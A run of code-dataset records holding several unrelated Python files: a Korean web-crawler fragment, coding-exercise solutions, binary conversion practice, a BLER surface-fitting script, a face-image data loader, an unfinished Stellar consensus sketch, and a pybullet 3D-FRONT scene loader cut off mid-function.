발생했습니다.')\r\n print('3초뒤 다시 시작합니다')\r\n time.sleep(3)\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) #경고무시창\r\nrequests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'\r\ntry:\r\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += 'HIGH:!DH:!aNULL'\r\nexcept AttributeError:\r\n # no pyopenssl support used / needed / available\r\n pass\r\n\r\n# 일단 복붙은 했는데 도저히 무슨원린지 모르겠다... 이건 verify 문제도 아닌가본데? 참고 : https://stackoverflow.com/questions/38015537/python-requests-exceptions-sslerror-dh-key-too-small\r\n\r\nvoid()\r\n\r\n\r\n# 거의 모든경우 이렇게 진행\r\n# 페이지번호도 따로 읽어야 한다. 페이지의 모든경우를 다읽었을 경우에도 다음페이지로 넘어가는 코드가 있어야한다. 단 번호만으로도 가능한경우엔 상관없다.\r\n# 개별 번호 역시 순차적으로 되지 않기 때문에 200인 경우에만 시도하도록 짜야한다.\r\n# if 200 = append 글내용 else = append error 404\r\n# 0624 내용자체는 문제가 없는데 자꾸 오류가 나는걸 보아 pyxl.append에서 문제가 나는것 같은데...\r\n# 파이엑셀로 저장하던걸 pandas로 액셀저장하도록 한 버전 pyexcel append가 어째서인지 짤림","repo_name":"kimjunghyun2/mystreamlit","sub_path":"0624crawiling.py","file_name":"0624crawiling.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"47172598580","text":"# Given a string s consisting of small English letters, find and return the first instance of a non-repeating character in it. If there is no such character, return '_'.\n\n# Example\n\n# For s = \"abacabad\", the output should be\n# first_not_repeating_character(s) = 'c'.\n\n# There are 2 non-repeating characters in the string: 'c' and 'd'. Return c since it appears in the string first.\n\n# For s = \"abacabaabacaba\", the output should be\n# first_not_repeating_character(s) = '_'.\n\n# There are no characters in this string that do not repeat.\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string s\n\n# A string that contains only lowercase English letters.\n\n# [output] char\n\n# The first non-repeating character in s of '_' if there are no characters that do not repeat.\nfrom collections import Counter\ndef first_not_repeating_character(s):\n# use a set for unique characters\n# or use a count of each character. if only 1 return character\n# else return \"_\"\n count = Counter(s)\n returnchar = \"\"\n boolean = False\n for num in count:\n if count[num] == 1:\n returnchar += num\n boolean = True\n break\n if boolean == False:\n returnchar = \"_\"\n return returnchar","repo_name":"jordan-hanson/codesignal-practice","sub_path":"Python/firstnotrepeatingcharacter.py","file_name":"firstnotrepeatingcharacter.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20724454115","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.8.10\n num = {}\n for i in range(len(A)):\n if A[i] in num:\n num[A[i]] += 1\n else:\n num[A[i]] = 1\n\n for elemt in num:\n if num[elemt] % 2 != 0:\n return elemt","repo_name":"Angela-OH/Algorithm","sub_path":"codility/lesson2_2.py","file_name":"lesson2_2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43346014501","text":"\"\"\"\nIncluded here: Day 10 of 30 Days to Code.\nSee the Jupyter Notebook for more notes related to this tutorial.\n\"\"\"\n\n#func that converts decimal to binary, returns string of bits, only works for <= 16-bit numbers\ndef Decimal2Binary(num): \n def innerAlg(num):\n #base case\n if num == 1: #last step has a dividend of 1\n return str(num % 2) #last steps bit is the left-most bit overall\n #recursive case\n remain = num % 2 #becomes bit for this step of the conversion\n #integer division here to get the dividend for the next step\n dividend = num // 2 #becomes dividend of next step, divisor of 2 always\n return str(innerAlg(dividend)) + str(remain) #bit from first step is the right-most bit\n\n #this function combines the output from before with leading zeros to represent the binary \n #number as a 16-bit or 2-byte number\n def innerFormat(string):\n bits = len(string) #number of bits from conversion to binary\n count = 16 - bits #finding number of needed leading zeros\n leadingZero = count * '0' #creating string to horizontally cat to binary number\n return leadingZero + string #returning the 16-bit number\n str1 = innerAlg(num) #calling the conversion scripts\n return innerFormat(str1) #returning the converted number, in binary, as a string\n \nDecimalNumber = 55 #number to convert to binary \nprint(f'{DecimalNumber} as a 16-bit binary number is:',Decimal2Binary(DecimalNumber))\n\n#Part of the Day 10 Coding Challenge, supposed to convert number then provide \n#the largest grouping of consecutive bits that are equal to 1\nBinStr = Decimal2Binary(DecimalNumber)\nBinaryNumber = BinStr\nBinStr = BinStr.split('0') #splits up the string at the zeros, reults in the groupings of 1's and empty elements\n#where the zeros once were\n\n#iterate through the string array, take only the elements that are not empty, find the length of each element,\n#find the element with the largest length, return that as the largest grouping of consecutive ones in the binary number.\nBinCount = max([len(num) for num in BinStr if num != ''])\nprint(f'The largest grouping of consecutive ones in the binary representation of {DecimalNumber} is:',BinCount)\n\ndef Binary2Decimal(num):\n #base cases\n if len(num) == 1 and num == str(1): #if the right most bit is 1, raise it tot he zero power\n return 2**0\n if len(num) == 1 and num != str(1): #if the right most bit is zero, pass back a zero for the summation of converted bits\n return 0\n\n #recursive cases\n bitlen = len(num) - 1 #get the exponent of the 2 for this bit\n current_bit = num[0] #keep the current bit to see if it'll become 0 or 2 raised to the exponent \n num = num[1::] #only pass the following right bits to the next step of the recursion\n if current_bit == str(1): #if the current bit is one, raise it to the exponent and got to the next recursion step\n return int(Binary2Decimal(num)) + 2**bitlen\n return int(Binary2Decimal(num)) + 0 #if the current bit is zero, make the conversion 0 and go to the next step of recursion \n\nprint(f'The binary number {BinaryNumber} represented in decimal is:',Binary2Decimal(BinaryNumber))","repo_name":"freddydrew/HackerRank","sub_path":"30DaysToCode/HowToBinaryPractice.py","file_name":"HowToBinaryPractice.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3223981331","text":"import warnings\nwarnings.filterwarnings('ignore')\n\nimport json, os, re, scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport matplotlib.colors as mcolors\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport seaborn as sns\nfrom fitter import Fitter, get_common_distributions, get_distributions\n\n\n\n# This finds our json files\nprint(\"This finds our json files\")\nloop = True\nwhile loop:\n# path_to_json = str(input(\"Directory of Json files (which should starts and ends with /): \"))\n path_to_json = './results/'\n # Store the in List called: json_files\n try:\n # Store the in List called: json_files\n json_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\n except:\n # if path is empty will get Error\n print(\"Error\")\n\n if len(json_files) != 0:\n loop = False\n\n\n# Here I define a list to store each json file as a DataFrame in a list\njson_list = list()\n\n# we need both the json and an index number so use enumerate()\nfor index,js in enumerate(json_files):\n with open(os.path.join(path_to_json, js)) as json_file:\n # Finding the location of gNodeB\n g_loc = re.findall('[x-y-p][\\d]{1,100}',js)\n\n # Loading Json\n json_text = json.load(json_file,parse_float=True)\n\n # Create DataFrame\n j_pd = pd.DataFrame.from_dict(json_text.items(),dtype=float)\n j_pd.columns = ['Location','BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]\n\n # For taking locations as a seperate DF\n if index == 0:\n # Append seperatly\n json_list.append(j_pd[['Location']])\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n else :\n # for rest of indexes except '0'\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n\n# Example of js\n# bs_uc3_ls50_ws50_x75_y50_n5000_p100.json\n\n\n# In this part we make our final DataFrame\n\n# combine DataFrames Except Location\nfinal = json_list[1]\nfor i in range(2,len(json_list)):\n final = pd.concat([final, json_list[i]], axis=1)\n\n#-----------------------------------------------\n# human sorting (also known as natural sorting):\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\ndef natural_keys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ]\n#-----------------------------------------------\n\n# sort the columns by using human sorting\nfinal = final.reindex(sorted(final.columns, key=natural_keys), axis=1)\n\n# Add Location DataFrame to the final DataFrame\nfinal = pd.concat([json_list[0], final], axis=1)\n\n# Convert Location of UE to Numpy Array\nUE_Loc = np.zeros([2500,2])\nfor i in range(len(final['Location'])):\n d = re.findall('[\\d]{0,100}',final['Location'][i])\n UE_Loc[i] = [int(d[0])/2,int(d[4])/2]\n\n# Create DataFrame of the UE Location\nlocdf=pd.DataFrame(UE_Loc,columns=['X','Y'])\n\n# Add locatio DataFrame to the Main DataFrame\nfinal = pd.concat([locdf, final], axis=1)\ndel final['Location']\n\n# Convert Location of gNodeB to Numpy Array\ngNodeB_Loc = np.zeros([int((len(final.columns)-2)/4),2])\nfor i in range(0,len(gNodeB_Loc)):\n d = re.findall('[\\d]{2,3}',final.columns[i*4+2])\n gNodeB_Loc[i] = [int(d[0])/2,int(d[1])/2]\n\nprint(final.head())\nprint(final[final.columns[2:]].describe())\n\n## Defining the Colors for ploting\n# Colors which will be used in plots\ncolors = ['tab:red', 'tab:blue', 'tab:green', 'tab:pink', 'tab:olive', 'tab:gray', 'tab:brown', 'tab:orange', 'tab:purple']\n\nsort_colors = True\nif sort_colors is True:\n by_hsv = sorted((tuple(mcolors.rgb_to_hsv(mcolors.to_rgb(color))),name) for name, color in mcolors.CSS4_COLORS.items())\n names = [name for hsv, name in by_hsv]\nelse:\n names = list(colors)\n\n\n# 3D contour plot lines\nnumberOfContourLines = 16\ngraphWidth = 800 # units are pixels\ngraphHeight = 600 # units are pixels\n\n\n## Class for finding the fit of the data and ploting the results\nclass fit_func:\n '''\n this class in put is the Data and the A0\n Dataset name\n Data is the x,y,z\n A0 is the location of the gNodeB of the data which is ploting\n '''\n def __init__(self,dataset_name,data,A0):\n self.dataset_name = dataset_name\n self.data = data\n self.A0 = A0\n\n def dist_plot(self, dataset_name):\n '''\n this def will get the data and plots the distribution and\n find the best fit for the data distribution to get the sigma and\n the mean of the data\n '''\n # sns.set_style('white')\n # sns.set_context(\"paper\", font_scale = 2)\n # sns.displot(data=final[[dataset_name]], kind=\"hist\", bins = 1000, aspect = 1.5)\n\n BLER = final[[dataset_name]].values\n f = Fitter(BLER,distributions=['gamma','lognorm',\"beta\",\"burr\",\"norm\"])\n\n f.fit()\n print(f.summary())\n best_fit = f.get_best(method = 'sumsquare_error')\n # key = best_fit.keys()\n # key, value = best_fit.items()\n if best_fit.keys() == 'lognorm':\n for key, value in best_fit.items():\n print(\"best fit is {}\".format(key))\n for k, v in value.items():\n if k == 's':\n s = v\n if k == 'loc':\n loc = v\n if k == 'scale':\n scale = v\n sigma = s\n mean_1 = scipy.stats.lognorm.mean(s, loc=loc, scale=scale)\n print(\"\\n Best Fit on distribution: {} | sigma: {} | mean: {} \".format(best_fit, sigma, mean_1))\n\n def ScatterPlot(self,data):\n '''\n this def will plots the scatter plot of the Data\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n\n plt.grid(True)\n axes = Axes3D(f)\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n axes.scatter(x_data, y_data, z_data)\n axes.set_title('Scatter Plot for {} Data'.format(self.dataset_name))\n axes.set_xlabel('X Data')\n axes.set_ylabel('Y Data')\n axes.set_zlabel('BLER Data')\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n\n\n def SurfacePlot(self,func, data,fittedParameters):\n '''\n this def will plots the data and the surface fit\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n plt.grid(True)\n axes = Axes3D(f)\n\n # Data of the plot\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n # defining the X and Y amd the Z of plot\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=1, antialiased=True)\n\n axes.scatter(x_data, y_data, z_data) # show data along with plotted surface\n\n axes.set_title('Surface Plot for {} Data and the Fit Surface'.format(self.dataset_name)) # add a title for surface plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n axes.set_zlabel('BLER') # Z axis data label\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def ContourPlot(self,func, data, fittedParameters):\n '''\n this def will plot the counter plot of the data to have\n the sight of BLER zones\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n axes = f.add_subplot(111)\n\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot(x_data, y_data, 'o')\n\n axes.set_title('Contour Plot for {} Data and shows the zone of BLERs'.format(self.dataset_name)) # add a title for contour plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n\n CS = plt.contour(X, Y, Z, numberOfContourLines, colors='k')\n plt.clabel(CS, inline=1, fontsize=10) # labels for contours\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def func(self,data, alpha, beta,a ,b):\n x1 = data[0]\n y1 = data[1]\n # A0 = data[2]\n ## 2D\n x = np.linspace(min(x1), max(x1), int(np.sqrt(len(x1))))\n y = np.linspace(min(y1), max(y1), int(np.sqrt(len(y1))))\n X , Y = np.meshgrid(x,y)\n Z = alpha * (((X-A0[0]+a)**2)) + beta*((Y-A0[1]+b)**2)\n return Z.ravel()\n\n\n def fit_c(self):\n '''\n this the is using ...\n for fit...\n boundaries ...\n method ...\n maxfev ...\n x_scale and f f_scale ...\n telorance ...\n loss ...\n function ...\n '''\n x,y = self.data[0],self.data[1]\n\n # defining fitting Function\n\n loop = True\n while loop:\n\n # getting mean and sigma of data\n self.dist_plot(self.dataset_name)\n\n initialParameters = [.0001, .0001, 0 , 6]\n # here a non-linear surface fit is made with scipy's curve_fit()\n tol = 10**-15\n fittedParameters, pcov = scipy.optimize.curve_fit(self.func, [x,y], z, bounds=([ 0, 0, -10, -10], [ .001, .001, 10, 10]),method='trf',\n p0 = initialParameters,maxfev=10000,ftol=tol, xtol=tol, gtol=tol,\n x_scale=0.1, loss='cauchy', f_scale=0.1, diff_step=None, verbose = 2)\n # ,sigma = 2.520656362227073/zData,absolute_sigma=False,maxfev=1000\n # sigma has been taken from fitter library and the fit was lognoraml\n # scipy.optimize.minimize()\n\n print('fitted prameters', fittedParameters)\n modelPredictions = self.func(data, *fittedParameters)\n absError = modelPredictions - z\n\n SE = np.square(absError) # squared errors\n MSE = np.mean(SE) # mean squared errors\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\n Rsquared = 1.0 - (np.var(absError) / np.var(z))\n\n # Condition for stopping the loop\n if (RMSE == RMSE and Rsquared == Rsquared):\n loop = False\n # ploting\n # ScatterPlot(data)\n print('RMSE:', RMSE)\n print('R-squared:', Rsquared)\n self.SurfacePlot(self.func, data,fittedParameters)\n self.ContourPlot(self.func, data, fittedParameters)\n return Rsquared,RMSE,fittedParameters\n\n\nif __name__ == \"__main__\":\n # Defining Data\n x = np.array(final['X'])\n y = np.array(final['Y'])\n RR_list = list()\n\n # this loops will only consider the p = 50\n for i in range(2,len(final.columns),4):\n # A0 is the location of the gNodeB for the exact data\n A0 = gNodeB_Loc[int(abs(i/4)),:]\n\n print(\"\\n calculating fit for gNodeB location: {} and data: {} \".format(A0,final.columns[i]))\n\n z = np.array(final[final.columns[i]])\n data = [x, y, z]\n\n\n # defining model\n model = fit_func(final.columns[i],data,A0)\n\n # Taking the RMSE and the Rsquared\n Rsquared,RMSE,fittedParameters = model.fit_c()\n\n # saving data in the RR_list\n RR_list.append([final.columns[i],Rsquared,RMSE,fittedParameters])\n","repo_name":"alivara/curve_fitting","sub_path":"Surface Fit/surface_fit.py","file_name":"surface_fit.py","file_ext":"py","file_size_in_byte":12568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2404749716","text":"\"\"\"Functions for reading youtube face data.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport math\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\nrootDir = 'C:\\\\frame_images_DB\\\\frame_images_DB'\nIMAGE_SIZE = 160\n\ndef resize_image(image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\toutput = np.zeros([IMAGE_SIZE, IMAGE_SIZE, 3])\n\toutput[start_y : start_y + height, start_x : start_x + width, :] = np.array(image.resize((width, height), Image.BILINEAR))\n\treturn output\n\ndef make_box(x, y, size, image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tratio = 0\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\t\tratio = IMAGE_SIZE / shape[0]\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\t\tratio = IMAGE_SIZE / shape[1]\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\treturn [(x - size/2) * ratio + start_x, (x + size/2) * ratio + start_x, (y - size/2) * ratio + start_y, (y + size/2) * ratio + start_y]\n\nclass DataSet(object):\n\n\tdef __init__(self, filelist):\n\t\tfo = open(filelist, 'r')\n\t\tself._lines = fo.readlines()\n\t\tself._num_examples = len(self._lines)\n\t\tself._iter = 0\n\n\tdef _load_image(self, index):\n\t\tparts = self._lines[index].split(',')\n\t\timage = Image.open(rootDir + '\\\\' + parts[0])\n\t\tresized_image = resize_image(image).reshape([1, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\tbox = np.array(make_box(float(parts[1]), float(parts[2]), float(parts[3]), image))\n\t\timage.close()\n\t\treturn resized_image, box\n\n\tdef next_batch(self, size):\n\t\tdata = np.zeros([size, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\ttruth = np.zeros([size, 4])\n\t\tfor i in xrange(size):\n\t\t\tdata[i, :, :, :], truth[i, :] = self._load_image(self._iter)\n\t\t\tself._iter = (self._iter + 13) % self._num_examples\n\t\treturn data, truth\n\n\t@property\n\tdef num_examples(self):\n\t\treturn self._num_examples\n","repo_name":"VoidSolitary/youtube_face","sub_path":"input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5575770232","text":"class SCPNode:\n class State:\n INIT = 0\n PREPARED = 1\n COMMITTED = 2\n EXTERNALIZED = 3\n \n def __init__(self, node_id, threshold=1):\n self.node_id = node_id\n self.state = SCPNode.State.INIT\n self.ballot_protocol = None\n self.value_to_ballot = {}\n self.threshold = threshold\n self.validators = set()\n self.quorum_slices = []\n\n def add_vote(self, slot_index, value):\n if slot_index not in self.nomination_protocol_state:\n self.nomination_protocol_state[slot_index] = {'votes': set(), 'accepted': set()}\n self.nomination_protocol_state[slot_index]['votes'].add(value)\n\n def add_validator_set(self, validators):\n \"\"\"\n Add a set of validators as a quorum slice.\n\n :param validators: A list of SCPNode instances.\n \"\"\"\n if len(validators) >= self.threshold:\n self.quorum_slices.append(set(validators))\n\n def nominate(self, slot_index, value):\n self.add_vote(slot_index, value)\n message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return message\n\n def receive_message(self, message):\n if message.message_type == 'nominate':\n self.process_nomination_protocol(message)\n elif message.message_type == 'ballot':\n self.process_ballot_protocol(message)\n\n def process_nomination_protocol(self, message):\n slot_index = message.slot_index\n value = message.value\n quorum_slice = message.quorum_slice\n\n self.add_vote(slot_index, value)\n\n # Check if the value is accepted by a quorum slice\n if self.node_id in quorum_slice.validator_set and self.is_accepted_by_quorum_slice(slot_index, value, quorum_slice):\n self.nomination_protocol_state[slot_index]['accepted'].add(value)\n\n # Broadcast a new nomination message if the value is not already accepted by the node\n if value not in self.nomination_protocol_state[slot_index]['accepted']:\n new_message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return new_message\n\n def process_ballot_protocol(self, message):\n slot_index = message.slot_index\n ballot = message.ballot\n quorum_slice = message.quorum_slice\n ballot_state = self.ballot_protocol_state.get(slot_index)\n\n if not ballot_state:\n # Initialize the ballot state for this slot index\n self.ballot_protocol_state[slot_index] = {\n 'current_ballot': None,\n 'preparing': None,\n 'prepared': None,\n 'committing': None,\n 'committed': None,\n 'externalized': None\n }\n ballot_state = self.ballot_protocol_state[slot_index]\n\n if message.message_type == 'prepare':\n self.process_prepare(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'commit':\n self.process_commit(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'externalize':\n self.process_externalize(ballot_state, message, quorum_slice)\n\n def process_prepare(self, ballot_state, message, quorum_slice):\n # Implementation of the prepare sub-protocol\n pass\n\n def process_commit(self, ballot_state, message, quorum_slice):\n # Implementation of the commit sub-protocol\n pass\n\n def process_externalize(self, ballot_state, message, quorum_slice):\n # Implementation of the externalize sub-protocol\n pass\n\n def is_accepted_by_quorum_slice(self, slot_index, value, quorum_slice):\n count = 0\n for node in quorum_slice.validator_set:\n if node == self.node_id:\n continue\n if node.nomination_protocol_state.get(slot_index, {}).get('votes', None) and value in node.nomination_protocol_state[slot_index]['votes']:\n count += 1\n if count >= quorum_slice.threshold:\n return True\n return False\n\nclass QuorumSlice:\n def __init__(self, threshold, validator_set):\n self.threshold = threshold\n self.validator_set = validator_set\n\n def contains(self, node_id):\n return node_id in self.validator_set\n\n def is_quorum(self, node_set):\n count = 0\n for node in self.validator_set:\n if node.node_id in node_set:\n count += 1\n if count >= self.threshold:\n return True\n return False\n\nclass SCPMessage:\n def __init__(self, message_type, sender, slot_index, quorum_slice, value=None, ballot=None):\n self.message_type = message_type\n self.sender = sender\n self.slot_index = slot_index\n self.quorum_slice = quorum_slice\n self.value = value\n self.ballot = ballot\n\n def to_dict(self):\n message_dict = {\n 'message_type': self.message_type,\n 'sender': self.sender,\n 'slot_index': self.slot_index,\n 'quorum_slice': {\n 'threshold': self.quorum_slice.threshold,\n 'validator_set': [node.node_id for node in self.quorum_slice.validator_set]\n }\n }\n if self.value is not None:\n message_dict['value'] = self.value\n if self.ballot is not None:\n message_dict['ballot'] = {\n 'counter': self.ballot.counter,\n 'value': self.ballot.value\n }\n return message_dict\n\n @classmethod\n def from_dict(cls, message_dict, nodes):\n quorum_slice_dict = message_dict['quorum_slice']\n quorum_slice = QuorumSlice(\n threshold=quorum_slice_dict['threshold'],\n validator_set=[nodes[node_id] for node_id in quorum_slice_dict['validator_set']]\n )\n ballot_dict = message_dict.get('ballot')\n ballot = None\n if ballot_dict:\n ballot = SCPBallot(\n counter=ballot_dict['counter'],\n value=ballot_dict['value']\n )\n return cls(\n message_type=message_dict['message_type'],\n sender=message_dict['sender'],\n slot_index=message_dict['slot_index'],\n quorum_slice=quorum_slice,\n value=message_dict.get('value'),\n ballot=ballot\n )\n\nclass SCPBallot:\n def __init__(self, counter, value):\n self.counter = counter\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, SCPBallot):\n return False\n return self.counter == other.counter and self.value == other.value\n\n def __lt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n if self.counter < other.counter:\n return True\n if self.counter == other.counter:\n return self.value < other.value\n return False\n\n def __le__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self < other\n\n def __gt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return not self <= other\n\n def __ge__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self > other\n\n def __repr__(self):\n return f\"SCPBallot(counter={self.counter}, value={self.value})\"\n","repo_name":"jzhao49/BlockchainsS23FinalProject","sub_path":"scp.py","file_name":"scp.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"27256331045","text":"#!/usr/bin/env python3\n\nimport os\nimport random\nimport json\nimport numpy as np\nimport time\nimport logging\nfrom typing import List\n\nfrom pathlib import Path\nimport pybullet as pb\nfrom dataclasses import dataclass\n\nfrom imm.sim.env.env_base import EnvironmentBase\nfrom imm.sim.sim_debug_utils import debug_get_full_aabb\n\n\ndef _ceildiv(a, b):\n \"\"\" from https://stackoverflow.com/a/17511341 \"\"\"\n return -(-a // b)\n\n\ndef _split_multibody_kwargs(kwargs: dict) -> List[dict]:\n \"\"\"\n Split kwargs for createMultiBody, so that\n the number of links do not exceed the hardcoded #128 limit.\n\n NOTE(ycho): This is a hack - consider alternative solutions.\n \"\"\"\n\n num_links = len(kwargs['linkMasses'])\n num_bodies = _ceildiv(num_links, 128)\n\n # NOTE(ycho): Still return as a list even\n # in a trivial case.\n if num_bodies <= 1:\n return [kwargs]\n m = num_links // num_bodies\n\n out = [None for _ in range(num_bodies)]\n for i in range(num_bodies):\n # link slice range ...\n i0 = i * m\n i1 = min((i+1)*m, num_links)\n\n # Start from a copy of `kwargs`.\n out[i] = dict(kwargs)\n\n # Reset properties that should be unique to\n # a single base.\n # NOTE(ycho): This does not pedantically clear ALL properties -\n # only the ones that are known to be set at creation.\n out[i]['baseCollisionShapeIndex'] = -1\n out[i]['baseVisualShapeIndex'] = -1\n\n # Set a slice of link properties.\n for k, v in kwargs.items():\n if k.startswith('link'):\n out[i][k] = v[i0:i1]\n\n # Move base-unique properties into the first element in the split args.\n out[0]['baseCollisionShapeIndex'] = kwargs['baseCollisionShapeIndex']\n out[0]['baseVisualShapeIndex'] = kwargs['baseVisualShapeIndex']\n\n return out\n\n\ndef _load_tdf_scene(scene_file: str, model_dir: str, sim_id: int,\n use_convex_collision: bool):\n \"\"\"\n Load a 3DFRONT scene.\n \"\"\"\n model_dir = Path(model_dir)\n\n data = None\n with open(scene_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if data is None:\n return None\n\n # Build mapping from uid <-> jid\n model_uid = []\n model_jid = []\n model_map = dict()\n for f in data['furniture']:\n if 'valid' in f and f['valid']:\n model_map[f['uid']] = f['jid']\n\n # Build mapping from uid <-> mesh = { vertices, face_indices }\n mesh_map = dict()\n for m in data['mesh']:\n mesh_map[m['uid']] = (\n np.reshape(m['xyz'], (-1, 3)).astype(np.float32),\n np.reshape(m['faces'], (-1, 3))\n )\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_set = set()\n for m in data['mesh']:\n if m['type'].strip() == 'Floor':\n floor_set.add(m['uid'])\n\n # Iterate through and add shapes . . .\n scene = data['scene']\n room = scene['room']\n shape_map = dict()\n kwargs = {\n 'baseMass': 0, # fixed,\n 'baseCollisionShapeIndex': -1,\n 'baseVisualShapeIndex': -1,\n 'basePosition': [0, 0, 0],\n # NOTE(ycho): +Y up convention -> +Z up convention\n 'baseOrientation': pb.getQuaternionFromEuler([np.pi/2, 0, 0]),\n 'baseInertialFramePosition': [0, 0, 0],\n 'baseInertialFrameOrientation': [0, 0, 0, 1],\n\n 'linkMasses': [],\n 'linkCollisionShapeIndices': [],\n 'linkVisualShapeIndices': [],\n 'linkPositions': [],\n 'linkOrientations': [],\n 'linkInertialFramePositions': [],\n 'linkInertialFrameOrientations': [],\n 'linkParentIndices': [],\n 'linkJointTypes': [],\n 'linkJointAxis': [],\n\n 'physicsClientId': sim_id\n }\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_vertices = np.empty((0, 3), dtype=np.float32)\n floor_face_indices = np.empty((0), dtype=np.int32)\n\n for r in room:\n room_id = r['instanceid']\n children = r['children']\n for c in children:\n ref = c['ref']\n\n def _lookup_cache(ref):\n \"\"\" Lookup collision shape from cache. \"\"\"\n if ref not in shape_map:\n return -1, -1\n return shape_map[ref]\n\n def 